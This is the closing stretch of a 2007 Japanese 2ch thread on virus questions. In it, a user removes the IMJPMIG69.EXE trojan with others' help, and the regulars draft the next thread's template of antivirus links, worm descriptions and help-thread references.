953 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:24:15
>>951
症状が出てるなら被害は出てるだろ
タスクマネージャで調べるとよろし

954 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:26:09
>>953
はい、とりあえずファイル名と同じだったexeファイルは消しました。
どうやら再発生しなくなったようなのですが……

955 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:37:08
>>954
動いてたなら復活すると思うがね

956 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:45:59
発生しました……orz

Connection refused (Error #10061)

というエラーが消しても消しても出てきます

957 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:52:07
>>956
PFWで何か塞いでいるんじゃないの?
どこかと通信しようとしてNG
ログに書いてあると思うけど

958 :947:2007/02/18(日) 01:52:08
IMJPMIG69.EXEをタスクマネージャにて発見しました。削除してまいります

959 :名無しさん@お腹いっぱい。:2007/02/18(日) 02:12:07
セキュリティ初心者質問スレから

436 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/02/17(土) 05:56:19
たぶんこれだろ

エロマンガにつられてexeを実行してしまった人へ
※以下OSがXP前提の話

C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除

「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除

再起動して様子見

※上記の内容がよく分からない、該当ファイルが見当たらないという場合
1.システムの復元もしくはOSの再インストール
2.回線引っこ抜いて寝る

960 :947:2007/02/18(日) 02:14:07
エロマンガにつられてexeを実行してしまった人へ
※以下OSがXP前提の話

C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除

「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除

再起動して様子見



この手順を実行したところ、エラーの発生やタスクマネージャの異常もなくなったようです。

961 :名無しさん@お腹いっぱい。:2007/02/18(日) 06:37:28
IMJPMIG69か
やっぱり><←こいつがあやしい
みてたら懺悔しな

962 : ◆N9P3SuvBPo :2007/02/18(日) 15:15:47
あと少しで次スレとなるわけですが、テンプレの方も次のように修正・変更しておきました。
まだ変更箇所があったら、とりあえずですが修正・変更のほどをお願いします。

963 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:17:16
前スレ
【ウィルス情報質問 総合スレッド★Part41】
http://pc10.2ch.net/test/read.cgi/sec/1167048038/

★質問用テンプレ★(面倒な人は次の☆質問用テンプレ(簡易版)☆を使ってください)
【使用OS】 「」
【Microsoft Updateの状態】 「」 
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」 
【スパイウェア対策ソフト】 「」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」

【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」

☆質問用テンプレ(簡易版)☆
【OS】
【対策ソフト】
【Update】
【スキャンした結果】
【症状】

その他のテンプレは>>2-13あたり

964 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:17:58
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
 製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。

965 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:18:36
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

966 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:19:18
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜

サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security

967 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:20:03
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

968 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:20:43
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

969 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:21:17
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット

970 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:29:27
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part10
http://pc10.2ch.net/test/read.cgi/sec/1169042051/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part12
http://pc10.2ch.net/test/read.cgi/sec/1162181635/

971 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:30:37
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html

関連スレッド
オンラインによるウイルスチェックサービス
http://pc10.2ch.net/test/read.cgi/sec/1031073684/

※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします

972 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:36:59
関連スレッド
セキュリティ初心者質問スレッドpart82
http://pc10.2ch.net/test/read.cgi/sec/1171285882/
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/
☆☆トロイの木馬☆☆4台目
http://pc10.2ch.net/test/read.cgi/sec/1171000137/
sasser【スタコラサッサ】sasser Part2
http://pc10.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc10.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc10.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc10.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc10.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc10.2ch.net/test/read.cgi/sec/1091346741/

関連スレは次スレに移行してる場合もあります。

質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

973 : ◆N9P3SuvBPo :2007/02/18(日) 15:39:14
                 、 、_
                  ヽヽ \、_
                 ,. -' ノノ ヽ  \
                _/ { / ‐-、 丶  ヽ、
                 /  _i´ ̄ ̄__ \、 l,. -―、
         _/\ / // /  ̄、 \ ヽヽ_, ノ!
       ヽ  \ \ / |,.イ l丶  \ X  ',  ノi
        !f´\\!  l_|_|\ \--/,r=ミ|  lヽ  ノ
        ヒ!_  \| l | N,≧ミ、トゝ ハ心}! K/ノ
          _ノ tl   | | l |{ ト心     `'" ! l_/
        \_\ _ハi、ヾゝゞ'′ _'_,.ヘ  / / ノ            テンプレはここまで!
           ヽ >/| lヽ\丶、__丶 _ノ/| /'´  /!
           /,ヘ | |ミニ='⌒ (⌒ヽ´ _ !´ーヽ'   `ヽ
         〈_ {  ヾ.,!/  , ´ \ ∨,.‐、ー‐、 l  _ノ       | ヽ|      |_    「 〉
                 !\ /   __ム  V⌒!   / ! ヽ      ⊥ 人_   _|_    |/
                レ-〈  / f´ ヽ. '. __! // /- '´                     O
              __   ヽ! |r'   \l__ V/ / /
           !     ー「 ! {  `\_f_ノ∠ ノ
           l   ィ'´ ̄ヽ`ヽ.二ニァ'V∠二ハ_ \
              〉/      ヽ---/´/レ!ト--'/‐"ノ
          |/        !/ ´ ̄ヽ/´ヽ `ヽ、
         _/           /    V/    \  \
        /\       ヽ/    〃    /人   トrァ
        <ハ   \        ,!\   |l         >'´/>
        メ、\  \     / l   `   |:!   __ / / 〈
           ヒ._ \  `ー---‐‐―ー‐!ヽ―'´ _ /イ `
           ´ア `K` iー---一'Tー-∨-r‐''´  |

974 :名無しさん@お腹いっぱい。:2007/02/18(日) 16:00:46
>>973もテンプレにいれるのん?


975 :名無しさん@お腹いっぱい。:2007/02/18(日) 16:14:18
入れなくていいだろ

976 :名無しさん@お腹いっぱい。:2007/02/18(日) 18:09:49
アボーソするAAを増やすのが宇材だけだが、


◆N9P3SuvBPoサソがどうしても、って言うなら我慢することにした。

977 : ◆N9P3SuvBPo :2007/02/18(日) 19:02:59
いや別に>973は俺個人の好みでだから

978 :名無しさん@お腹いっぱい。:2007/02/18(日) 21:22:04
>>937
またNOD32等で検出できないウイルスが出ているね。
気を付けるにこしたことがない。


マイクロソフトの検出名:TrojanDownloader:Win32.Agent.FZ
http://vista.crap.jp/img/vi7180030368.jpg
http://www.virustotal.com/


979 :名無しさん@お腹いっぱい。:2007/02/18(日) 21:45:04
>>97
乙です
>>973はともかくとしてw botをテンプレにいれるのは賛成です
気づきにくいうえに経済的なダメージを与えうるウイルスですからね


980 :名無しさん@お腹いっぱい。:2007/02/18(日) 21:46:38
>>978


981 : ◆N9P3SuvBPo :2007/02/18(日) 23:33:29
では立てて来ます。

982 : ◆N9P3SuvBPo :2007/02/18(日) 23:37:56
「現在のホストではしばらく無理」と出た

>>963-972です。
誰かよろしく。

983 :名無しさん@お腹いっぱい。:2007/02/18(日) 23:41:25
いってみる

984 :名無しさん@お腹いっぱい。:2007/02/18(日) 23:52:22
【ウィルス情報質問 総合スレッド★Part42】
http://pc10.2ch.net/test/read.cgi/sec/1171809750/

たてましたー

985 : ◆N9P3SuvBPo :2007/02/18(日) 23:53:11
>984さん、お疲れ様でした。
お茶でもどうぞつ旦

986 :名無しさん@お腹いっぱい。:2007/02/19(月) 00:05:04
>>984
鬱〜、いや・・・乙〜

987 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:42:33
産め

988 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:44:02
うむ

989 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:49:24
うめ

990 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:51:05



991 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:52:18
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

992 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:54:14


993 : ◆N9P3SuvBPo :2007/02/19(月) 23:54:22
1000取って寝よ

994 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:57:52
>>993
ガンガレ

995 : ◆N9P3SuvBPo :2007/02/20(火) 00:05:15
うめ

996 : ◆N9P3SuvBPo :2007/02/20(火) 00:06:40
残り4レス

997 :名無しさん@お腹いっぱい。:2007/02/20(火) 00:07:14
>◆N9P3SuvBPo
ふぁいと〜

998 : ◆N9P3SuvBPo :2007/02/20(火) 00:07:49
残り2

999 :名無しさん@お腹いっぱい。:2007/02/20(火) 00:10:49

     }                     }
     }                    /  o ゚.  
.     〉'' ,、,,,__               ノ} 。 :∴   
     i ムツッ=,ニ_゙゙"''‐- 、、,,,__,,..,,,.. -‐'''"/ 。 X,,    
     l {{ ハ` `゚'~`  ,‐-,ニ二ヾ,,_ヽ   /   i'(_,.l\
      〉、`ハ    }  ` `゚'゙゙” }}'゙   ,'    ti=ti、iiヽ
.     / ハヽハ  ノ       //    {      ゙ヾヽ}
    / /ハヽヘ  `、_   (Cノ/  /  ハ      ノラ
   / // } Y゙\ `   Cノイ  /    \    〆'
. / / / /  ,ゞ,, `-‐ ''´〆⌒ヽ{  ,' ハ   \
 ;''"''ヾノ /_,/  `'' ァ''7/     \l l ヽヾ   \
 ゞ..,,.'' ̄//    ''´ //       \  \ヾ   \

1000 : ◆N9P3SuvBPo :2007/02/20(火) 00:10:52
1000ゲット!

次スレであります
【ウィルス情報質問 総合スレッド★Part42】
http://pc10.2ch.net/test/read.cgi/sec/1171809750/

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

367 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)